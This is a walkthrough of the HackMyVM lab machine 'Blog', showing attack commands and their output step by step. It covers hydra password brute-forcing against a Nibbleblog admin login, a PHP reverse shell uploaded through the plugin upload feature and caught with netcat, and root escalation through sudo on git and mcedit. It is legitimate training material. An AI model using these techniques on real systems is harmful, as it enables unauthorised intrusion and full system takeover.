“Blog” is an easy machine from HackMyVM by d4t4s3c. If you have done many machines, this is a piece of cake. If you are new, I definitely suggest you do it on your own. The enumeration starts with enumerating the directories and finding a special blog. It has a file upload vulnerability and one can execute a PHP script giving us a reverse shell. Then, we have to escalate to another user ‘admin’ using sudo permissions on git. Lastly, we have another binary ‘mcedit’ that gives us the root shell. “Blog Writeup from HackMyVM – Walkthrough”
Step 1: Get the IP address
Firstly, we have to identify the IP address of the target machine. I mostly use fping and netdiscover for this purpose.
❯ fping -aqg 10.0.0.0/24 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4 10.0.0.139
The IP address of the target is 10.0.0.139 and that of my Kali Linux machine is 10.0.0.4.
Step 2: Scan open ports
Next, we have to identify the open services on the target. Most of the time, it is the HTTP web server. Let’s check if there is anything other than it.
❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.139 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 21:30 +0545 Nmap scan report for blog.hmv (10.0.0.139) Host is up (0.00082s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA) | 256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA) |_ 256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Apache/2.4.38 (Debian) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As I said, there is only the HTTP server to enumerate further.
Step 3: Enumerate the webserver
On the HTTP server, we can see that it’s pinging the localhost. I checked if there is any GET parameters on the script that would allow us to command execution. However, I couldn’t do anything from the ‘index.php’ page. Thus, I performed directory enumeration using gobuster.
❯ gobuster dir -q -r -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.139 -x txt,html,php -o medium.log /index.php (Status: 200) [Size: 271] /my_weblog (Status: 200) [Size: 4317]
Here, we can find a new path ‘/my_weblog’ that further needs enumeration.
Step 4: Enumerating the blog
When we check the page source, we can find that it is a Nibbleblog.
<!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <title>Blog - Welcome to admin blog</title> <meta name="description" content="Welcome to Nibbleblog"> <meta name="generator" content="Nibbleblog"> <!-- ------------ snip ------------------ --> </html>
Upon checking the exploit for this CMS on the internet, I got to know it suffers from arbitrary file upload vulnerability. However, this requires authentication. I randomly checked the path /admin.php on the target. Fortunately, I found the admin login page.
To bruteforce, we require the input names. By looking at the source code of the admin page, we find out that they are “username” and “password”.
<form id="js_form" name="form" method="post"> <div class="form_block"><input class="username" name="username" type="text" placeholder="Username" autocomplete="off" maxlength="254"></div> <div class="form_block"><input class="password" name="password" type="password" placeholder="Password" autocomplete="off" maxlength="254"></div> <div class="form_block"><input type="checkbox" id="js_remember" name="remember" class="float" value="1"><label class="for_checkbox remember" for="js_remember">Remember me</label><input type="submit" class="save" value="Login"></div> </form>
Lastly, I performed the bruteforcing using hydra. For hydra bruteforcing, we need something that will recognize whether either the login attempt was successful or not. In this case, we can recognise the invalid login by the word “Incorrect” that we get after getting an unsuccessful login.
❯ hydra -l admin -P /home/kali/rockyou.txt 'http-post-form://10.0.0.139/my_weblog/admin.php:username=^USER^&password=^PASS^:Incorrect'
We get the password “k*****” for the user admin.
Step 5: Insecure file upload
For the reverse shell, I use revshells.com.
The vulnerability is that the admin can upload any file from “Plugins > Plugin :: My image”. We can find the uploaded script from the path “/content/private/plugins/my_image/image.php”.
I listen on port 9001.
❯ nc -nlvp 9001 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001
After listening, I uploaded the shell and visited the uploaded path to get the reverse shell. Next, I upgraded it to a proper shell.
❯ nc -nlvp 9001 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.0.0.139. Ncat: Connection from 10.0.0.139:43156. Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux 17:20:49 up 2:18, 0 users, load average: 0.00, 0.01, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@blog:/$ ^Z  + 8086 suspended nc -nlvp 9001 ❯ stty raw -echo;fg  + 8086 continued nc -nlvp 9001 www-data@blog:/$ export TERM=xterm www-data@blog:/$ stty rows 30 cols 168 www-data@blog:/$
Step 6: Upgrade to the user ‘admin’
After we get the foothold, we can check the sudo permissions. There is the binary git that allows us access to the user ‘admin.
www-data@blog:/$ sudo -l sudo: unable to resolve host blog: No address associated with hostname Matching Defaults entries for www-data on blog: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on blog: (admin) NOPASSWD: /usr/bin/git
From the gtfobins, I picked up a command that would give me a ‘less’ utility.
sudo -u admin git -p help config !/bin/bash
Step 7: Upgrade to the root user
After we get the admin user, we can see his sudo permissions too.
admin@blog:/$ sudo -l sudo: unable to resolve host blog: No address associated with hostname Matching Defaults entries for admin on blog: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User admin may run the following commands on blog: (root) NOPASSWD: /usr/bin/mcedit
Upon opening the binary, we see an editor. On the File menu (Alt+F), there is a menu item, User menu… (F11). After this, we can choose “Invoke `shell'” (s). This gives us an sh shell. After this, we can open bash shell by typing “/bin/bash”.
admin@blog:/$ sudo mcedit sudo: unable to resolve host blog: No address associated with hostname # /bin/sh /tmp/mc-root/mcusrR641H1 # bash root@blog:/# echo nepcodex.com; md5sum /etc/shadow nepcodex.com f3587fe9c737ad77ab2ff8590e27ce17 /etc/shadow root@blog:/#
In this way, we can get to the root shell.
Also read: DarkHole_2 Walkthrough – Vulnhub – Writeup